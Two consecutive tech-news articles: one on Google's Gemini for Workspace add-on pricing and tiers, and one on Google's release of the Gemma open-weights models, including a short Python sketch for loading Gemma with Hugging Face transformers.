Google went ahead with plans to launch Gemini for Workspace today. The big news is the pricing information, and you can see the Workspace pricing page is new, with every plan offering a “Gemini add-on.” Google’s old AI-for-Business plan, “Duet AI for Google Workspace,” is dead, though it never really launched anyway.

Google has a blog post explaining the changes. Google Workspace starts at $6 per user per month for the “Starter” package, and the AI “Add-on,” as Google is calling it, is an extra $20 monthly cost per user (all of these prices require an annual commitment). That is a massive price increase over the normal Workspace bill, but AI processing is expensive. Google says this business package will get you “Help me write in Docs and Gmail, Enhanced Smart Fill in Sheets and image generation in Slides.” It also includes the “1.0 Ultra” model for the Gemini chatbot—there’s a full feature list here. This $20 plan is subject to a usage limit for Gemini AI features of “1,000 times per month.”

The new Workspace pricing page, with a “Gemini Add-On” for every plan.

Google

Gemini for Google Workspace represents a total rebrand of the AI business product and some amount of consistency across Google’s hard-to-follow, constantly changing AI branding. Duet AI never really launched to the general public. The product, announced in August, only ever had a “Try” link that led to a survey, and after filling it out, Google would presumably contact some businesses and allow them to pay for Duet AI. Gemini Business now has a checkout page, and any Workspace business customer can buy the product today with just a few clicks.

Google’s second plan is “Gemini Enterprise,” which doesn’t come with any usage limits, but it’s also only available through a “contact us” link and not a normal checkout procedure. Enterprise is $30 per user per month, and it “includes additional capabilities for AI-powered meetings, where Gemini can translate closed captions in more than 100 language pairs, and soon even take meeting notes.”

Google goes “open AI” with Gemma, a free, open-weights chatbot family

Free hallucinations for all —

Gemma chatbots can run locally, and they reportedly outperform Meta’s Llama 2.

The Google Gemma logo

On Wednesday, Google announced a new family of AI language models called Gemma, which are free, open-weights models built on technology similar to the more powerful but closed Gemini models. Unlike Gemini, Gemma models can run locally on a desktop or laptop computer. It’s Google’s first significant open large language model (LLM) release since OpenAI’s ChatGPT started a frenzy for AI chatbots in 2022.

Gemma models come in two sizes: Gemma 2B (2 billion parameters) and Gemma 7B (7 billion parameters), each available in pre-trained and instruction-tuned variants. In AI, parameters are values in a neural network that determine AI model behavior, and weights are a subset of these parameters stored in a file.

Developed by Google DeepMind and other Google AI teams, Gemma pulls from techniques learned during the development of Gemini, which is the family name for Google’s most capable (public-facing) commercial LLMs, including the ones that power its Gemini AI assistant. Google says the name comes from the Latin gemma, which means “precious stone.”

While Gemma is Google’s first major open LLM since the launch of ChatGPT (it has released smaller research models such as FLAN-T5 in the past), it’s not Google’s first contribution to open AI research. The company cites the development of the Transformer architecture, as well as releases like TensorFlow, BERT, T5, and JAX as key contributions, and it would not be controversial to say that those have been important to the field.

A chart of Gemma performance provided by Google. Google says that Gemma outperforms Meta’s Llama 2 on several benchmarks.

Owing to lesser capability and high confabulation rates, smaller open-weights LLMs have been more like tech demos until recently, as some larger ones have begun to match GPT-3.5 performance levels. Still, experts see source-available and open-weights AI models as essential steps in ensuring transparency and privacy in chatbots. Google Gemma is not “open source,” however, since that term usually refers to a specific type of software license with few restrictions attached.

In reality, Gemma feels like a conspicuous play to match Meta, which has made a big deal out of releasing open-weights models (such as LLaMA and Llama 2) since February of last year. That technique stands in opposition to AI models like OpenAI’s GPT-4 Turbo, which is only available through the ChatGPT application and a cloud API and cannot be run locally. A Reuters report on Gemma focuses on the Meta angle and surmises that Google hopes to attract more developers to its Vertex AI cloud platform.

We have not used Gemma yet; however, Google claims the 7B model outperforms Meta’s Llama 2 7B and 13B models on several benchmarks for math, Python code generation, general knowledge, and commonsense reasoning tasks. It’s available today through Kaggle, a machine-learning community platform, and Hugging Face.
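Based on how other open-weights models are served through Hugging Face’s transformers library, loading Gemma locally would presumably look something like the sketch below. The “google/gemma-7b-it” model ID and any license-gating steps are assumptions, not something we have tested.

from transformers import AutoModelForCausalLM, AutoTokenizer

# "google/gemma-7b-it" is assumed from the release announcement; access
# may require accepting Google's terms on Hugging Face first.
tokenizer = AutoTokenizer.from_pretrained("google/gemma-7b-it")
model = AutoModelForCausalLM.from_pretrained("google/gemma-7b-it")

inputs = tokenizer("What does the Latin word 'gemma' mean?", return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=50)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))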

In other news, Google paired the Gemma release with a “Responsible Generative AI Toolkit,” which Google hopes will offer guidance and tools for developing what the company calls “safe and responsible” AI applications.
